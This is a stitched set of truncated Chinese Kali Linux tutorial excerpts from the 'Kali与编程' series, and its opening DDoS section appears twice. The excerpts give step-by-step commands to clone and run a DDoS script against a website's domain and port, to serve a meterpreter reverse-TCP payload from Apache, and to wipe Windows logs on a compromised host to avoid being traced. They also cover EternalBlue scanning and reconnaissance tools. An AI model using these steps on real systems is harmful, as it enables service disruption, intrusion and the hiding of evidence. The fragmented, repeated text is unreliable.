Kali Linux

课前声明： 1、本分享仅做学习交流，请自觉遵守法律法规！ 2、搜索：Kali 与编程，学习更多网络***干货！ 3、Kali 与编程每天准时更新，敬请学习和关注！ 二、资源装备 1.安装好 Kali Linux 的虚拟机一台 2.用于DDOS（拒绝式服务***）的网站一个； 3.整装待发的小白一个。 三、战略安排 3.1 下载DDOS（分布式拒绝服务***）工具------DDOS-Attack，如下图所示。 命令：git clone https://github.com/HaMrX/DDOs-Attack 3.2 DDOS***工具下载进度如下图所示。 3.3 查看当前文件夹寻找DDOS***工具存储文件夹，如下图所示。 命令：ls -l 3.4 将文件夹切换到下载的DDOS工具的存储文件夹中，如下图所示。 命令：cd DDOs-Attack/ 3.5 给DDOS***脚本赋予执行权限，如下图所示。 命令：chmod +x ddos-attack.py 3.6 执行DDOS***脚本，如下图所示。 命令：python ddos-attack.py 3.7 进入DDOS工具----DDOS Attack，如下图所示。 3.8 设置***参数（需要***的网站域名、端口号），如下图所示。 命令：IP Target:需要***的域名 命令：Port：端口号 3.9 ***进度如下图所示

课前声明： 1、本分享仅做学习交流，请自觉遵守法律法规！ 2、搜索：Kali 与编程，学习更多网络***干货！ 3、Kali 与编程每天准时更新，敬请学习和关注！ 二、资源装备 1.安装好 Kali Linux 的虚拟机一台 2.用于DDOS（拒绝式服务***）的网站一个； 3.整装待发的小白一个。 三、战略安排 3.1 下载DDOS（分布式拒绝服务***）工具------DDOS-Attack，如下图所示。 命令：git clone https://github.com/HaMrX/DDOs-Attack 3.2 DDOS***工具下载进度如下图所示。 3.3 查看当前文件夹寻找DDOS***工具存储文件夹，如下图所示。 命令：ls -l 3.4 将文件夹切换到下载的DDOS工具的存储文件夹中，如下图所示。 命令：cd DDOs-Attack/ 3.5 给DDOS***脚本赋予执行权限，如下图所示。 命令：chmod +x ddos-attack.py 3.6 执行DDOS***脚本，如下图所示。 命令：python ddos-attack.py 3.7 进入DDOS工具----DDOS Attack，如下图所示。 3.8 设置***参数（需要***的网站域名、端口号），如下图所示。 命令：IP Target:需要***的域名 命令：Port：端口号 3.9 ***进度如下图所示

本分享仅做学习交流，请自觉遵守法律法规！ 搜索：Kali与编程，学习更多网络***干货！ 下篇文章将在明天下午五点发布，敬请关注！ 一、背景介绍 Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework，简称叫做MSF。Metasploit作为全球最受欢迎的工具，不仅仅是因为它的方便性和强大性，更重要的是它的框架。它允许使用者开发自己的漏洞脚本，从而进行测试。 Metasploit提供了大量的模块。当用户希望快速找到针对某漏洞模块时，则可以使用search命令进行搜索。搜索模块时，用户可以指定搜索类型、CVE ID、发布时间等，如search cve:2009 type:exploit。为了方便用户搜索模块，可以使用help search命令查看所有支持的过滤器。 Metasploit(msf)究竟威力如何呢？接下来让我们一起学习！ 二、资源装备 1.安装好Kali Linux的虚拟机一台； 2.整装待发的小白一个。 三、战略安排 3.1 启动metasloit（msf）命令的简单使用，如下图所示。 命令：msfconsole,进入msf***框架。 3.2 metasloit（msf）search命令的简单使用，如下图所示。 命令：search ms08-067,利用search命令进行检索漏洞 Name:

课前声明： 1、本分享仅做学习交流，请自觉遵守法律法规！ 2、搜索：Kali 与编程，学习更多网络***干货！ 3、Kali 与编程每天准时更新，敬请学习和关注！ 正文部分 三、战略安排 3.1 查看监听主机的apapche2状态，如下图所示。 命令：service apapche2 status 3.2 开启监听主机的apapche2主机，如下图所示。 命令：service apache2 start 3.3 将生成的“windows-meterpreter-staged-reverse-tcp-555.exe”文件复制到apapche2目录下，如下图所示。 命令：cp windows-meterpreter-staged-reverse-tcp-555.exe /var/www/html 3.4 删除“/var/www/html”目录下一些不相干的文件，只保留payload文件，如下图所示。 命令：rm /var/www/html/index.html 命令：rm /var/www/html/index.nginx-debian.html 3.5 查看“/var/www/html”目录下是否只存在payload文件，如下图所示。 命令：ls /var/www/html/ 3.6 在物理机中访问处于监听状态下的kali linux主机，如下图所示。 3.7

课前声明： 1、本分享仅做学习交流，请自觉遵守法律法规！ 2、搜索：Kali 与编程，学习更多网络***干货！ 3、Kali 与编程每天准时更新，敬请学习和关注！ 正文部分 一、背景介绍 DMitry 工具是用来查询 IP 或域名 WHOIS 信息的。WHIOS 是用来查询域名是否已经被注册及已经注册域名的详情大的数据库（如域名所有人和域名注册商）。使用该工具可以查询到域名的注册商和过期时间等。 二、资源装备 1.安装好 Kali Linux 的虚拟机一台； 2.kali linux 受害者虚拟机一个； 3.整装待发的小白一个。 三、战略安排 3.1 查看dmitry域名检测工具的使用方法，如下图所示。 dmitry dmitry [-winsepfb] [-t 0-9] [-o %host.txt] host 3.2 dmitry域名检测工具-o参数的简介，如下图所示。 -o :导出扫描结果到文档中。 3.3 dmitry域名检测工具-i参数的简介，如下图所示。 -i ：后跟扫描的目标ip地址。 3.4 dmitry域名检测工具-w参数的简介，如下图所示。 -w :表示进行whois查询。 3.5 dmitry域名检测工具-n参数的简介，如下图所示。 -n ：在主机上检索Netcraft.com信息。 3.6 dmitry域名检测工具-s参数的简介，如下图所示。 -s :

   我用的是Kali Linux做演示   当我们使用Linux却不知道添加了多少用户，做法如下： w 命令显示目前登入系统的用户信息：   在用w命令查看当前用户后，可用su命令进行切换， cat /etc/passwd 可以查看所有用户的列表 ：   缺点是，信息量太多，不是很醒目的看到有多少用户。 cat /etc/group 查看用户组（效果和2一样）： Linux下查看用户列表最高效的命令： cat /etc/passwd|grep -v nologin|awk -F":" ‘{ print $1"|"$3"|"$4 }’|more （最精简） cat /etc/passwd|grep -v nologin|grep -v halt|grep -v shutdown|awk -F":" ‘{ print $1"|"$3"|"$4 }’|more （如果想查看更多的内容可以改用次命令，在不同状态下会显示不同。）    命令简略讲解：     ●  passwd 是个文本文件, 它包含了一个系统帐户列表, 给出每个帐户一些有用的信息，比如用户 ID,组 ID, 家目录, shell,等. 通常它也包含了每个用户经过加密的密码. 它通常应该是可读的（许多命令，工具程序，象 ls (1) 用它做用户 Id 到用户名称的映射）,但是只允许超级用户有写方式权限

课前声明： 1、本分享仅做学习交流，请自觉遵守法律法规！ 2、搜索：Kali 与编程，学习更多网络***干货！ 3、Kali 与编程每天准时更新，敬请学习和关注！ 正文部分 一、背景介绍 一般来说，Windows的日志文件通常有应用bai程序日志，安du全日志、系统日志、DNS服务zhi器日志、FTP日志、WWW日志等等。 系统日志是记录系统中硬件、软件和系统问题的信息，同时还可以监视系统中发生的事件。用户可以通过它来检查错误发生的原因，或者寻找受到***时***者留下的痕迹。系统日志包括系统日志、应用程序日志和安全日志。 那么当我们对某主机进行***测试并且拿下目标主机后，如何保证不被对方网络管理员反向追踪呢？如何更好的隐藏自己呢？接下来让我们一同学习！ 二、资源装备 1.安装好 Kali Linux 的虚拟机一台； 2.Windows 受害者虚拟机一个； 3.整装待发的小白一个。 三、战略安排 3.1 查看***者Kali Linux主机的sessions状态，如下图所示。 命令：sessions 3.2 根据sessions信息连接对应的session，如下图所示进入到连接界面。 命令：sessions -i sessions_ID 命令：sessions -i 6 3.3 在受害者windows主机中打开Dos界面，进入日志管理界面，如下图所示。 命令：Win+R 命令

课前声明： 本分享仅做学习交流，请自觉遵守法律法规！ 搜索：Kali与编程，学习更多网络***干货！ 下篇文章将在明天下午五点发布，敬请关注！ 【补充】FTP***测试实验环境搭建技巧 一、背景介绍 FTP是用来在两台计算机之间传输文件，是Internet中应用非常广泛的服务之一。它可根据实际需要设置各用户的使用权限，同时还具有跨平台的特性，即在UNIX、Linux和Windows等操作系统中都可实现FTP客户端和服务器，相互之间可跨平台进行文件的传输。因此，FTP服务是网络中经常采用的资源共享方式之一。FTP协议有PORT和PASV两种工作模式，即主动模式和被动模式。 FTP（File Transfer Protocol）即文件传输协议，是一种基于TCP的协议，采用客户/服务器模式。通过FTP协议，用户可以在FTP服务器中进行文件的上传或下载等操作。虽然现在通过HTTP协议下载的站点有很多，但是由于FTP协议可以很好地控制用户数量和宽带的分配，快速方便地上传、下载文件，因此FTP已成为网络中文件上传和下载的首选服务器。同时，它也是一个应用程序，用户可以通过它把自己的计算机与世界各地所有运行FTP协议的服务器相连，访问服务器上的大量程序和信息。FTP服务的功能是实现完整文件的异地传输。 二、资源装备 1.安装好Kali Linux的虚拟机一台； 2.受害者Win2008

课前声明： 1、本分享仅做学习交流，请自觉遵守法律法规！ 2、搜索：Kali与编程，学习更多网络***干货！ 基础知识介绍： 1.何为永恒之蓝？ 永恒之蓝（Eternal Blue）爆发于2017年4月14日晚，是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限，以此来控制被***的计算机。甚至于2017年5月12日， 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒，使全世界大范围内遭受了该勒索病毒，甚至波及到学校、大型企业、政府等机构，只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。 2.什么是SMB协议？ SMB（全称是Server Message Block）是一个协议服务器信息块，它是一种客户机/服务器、请求/响应协议，通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源，电脑上的网上邻居就是靠SMB实现的；SMB协议工作在应用层和会话层，可以用在TCP/IP协议之上，SMB使用TCP139端口和TCP445端口。 ***步骤： 一、确定***目标 1.1使用kali打开nmap扫描目标主机。 使用nmap执行命令 nmap -sS -A 192.168.17.149 -sS（使用SYN扫描）,-A(启用操作系统检测和版本检测)。 1.2根据我们的扫描结果可以大致判断该系统可能存在永恒之蓝漏洞。 二、**

课前声明： 1、本分享仅做学习交流，请自觉遵守法律法规！ 2、搜索：Kali与编程，学习更多网络***干货！ 3、Kali与编程每天准时更新，敬请学习和关注！ 一、背景介绍 FTP是用来在两台计算机之间传输文件，是Internet中应用非常广泛的服务之一。它可根据实际需要设置各用户的使用权限，同时还具有跨平台的特性，即在UNIX、Linux和Windows等操作系统中都可实现FTP客户端和服务器，相互之间可跨平台进行文件的传输。因此，FTP服务是网络中经常采用的资源共享方式之一。FTP协议有PORT和PASV两种工作模式，即主动模式和被动模式。 FTP（File Transfer Protocol）即文件传输协议，是一种基于TCP的协议，采用客户/服务器模式。通过FTP协议，用户可以在FTP服务器中进行文件的上传或下载等操作。虽然现在通过HTTP协议下载的站点有很多，但是由于FTP协议可以很好地控制用户数量和宽带的分配，快速方便地上传、下载文件，因此FTP已成为网络中文件上传和下载的首选服务器。同时，它也是一个应用程序，用户可以通过它把自己的计算机与世界各地所有运行FTP协议的服务器相连，访问服务器上的大量程序和信息。FTP服务的功能是实现完整文件的异地传输。 二、资源装备 1.安装好Kali Linux的虚拟机一台； 2.受害者Win2008 server虚拟机一个； 3